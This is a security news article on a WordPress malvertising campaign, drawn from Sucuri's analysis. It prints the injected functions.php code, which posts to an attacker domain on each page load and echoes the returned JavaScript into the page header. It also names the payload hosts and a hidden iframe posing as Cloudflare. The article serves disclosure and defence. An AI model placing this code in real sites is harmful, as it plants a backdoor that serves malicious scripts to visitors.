WordPress websites have become a prime target for threat actors seeking to monetize traffic and compromise visitor security.
In recent months, a new malvertising campaign has emerged, leveraging silent PHP code injections within theme files to serve unwanted third-party scripts.
The attack blends seamlessly with legitimate site operations, delivering obfuscated JavaScript that redirects visitors, displays pop-ups, and evades security tools without raising suspicion.
Initially discovered by a site owner noticing unexplained script loads, the intrusion originated from a small block of PHP code appended to the active theme’s functions.php
file.
This injection did not alter visible page content, instead executing behind the scenes on every request.
Sucuri analysts identified the campaign after detecting anomalous JavaScript calls to attacker-controlled domains and blocklisting by multiple security vendors.
The attack primarily exploits weak file permissions and outdated themes. By gaining write access—often through compromised credentials or vulnerable plugins—hackers insert a seemingly benign function that contacts a command-and-control server.
Once invoked via the wp_head
hook, the function fetches a dynamic JavaScript payload and echoes it into the page’s section, ensuring execution before the rest of the page loads.
Sucuri researchers noted that the injected function establishes a POST connection to a remote endpoint at hxxps://brazilc[.]com/ads.php, retrieves the malicious script, and embeds it directly into the HTML document.
The payload performs two main actions: loading a traffic-distribution script from porsasystem.com/6m9x.js
and injecting a hidden 1×1 pixel iframe that mimics Cloudflare’s challenge platform.
These techniques enable forced redirects, pop-ups, and evasion of security scanners by disguising malicious activity as legitimate CDN operations.
Infection Mechanism
The infection mechanism hinges on the following PHP function injected into functions.php
:-
// Injected PHP function in functions.php
function ti_custom_javascript() {
$response = wp_remote_post(
'https://brazilc.com/ads.php',
array('timeout' => 15, 'body' => array('url' => home_url()))
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
add_action('wp_head', 'ti_custom_javascript');
Upon each page load, this function silently executes, contacting the C&C server and printing the returned JavaScript payload into the page header.
.webp)
The attacker’s script then loads further malicious code asynchronously, leveraging attributes like data-cfasync="false"
and async
to bypass Cloudflare Rocket Loader.
By embedding within a hidden iframe, the malware evades detection and resides persistently until the injected code is removed.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.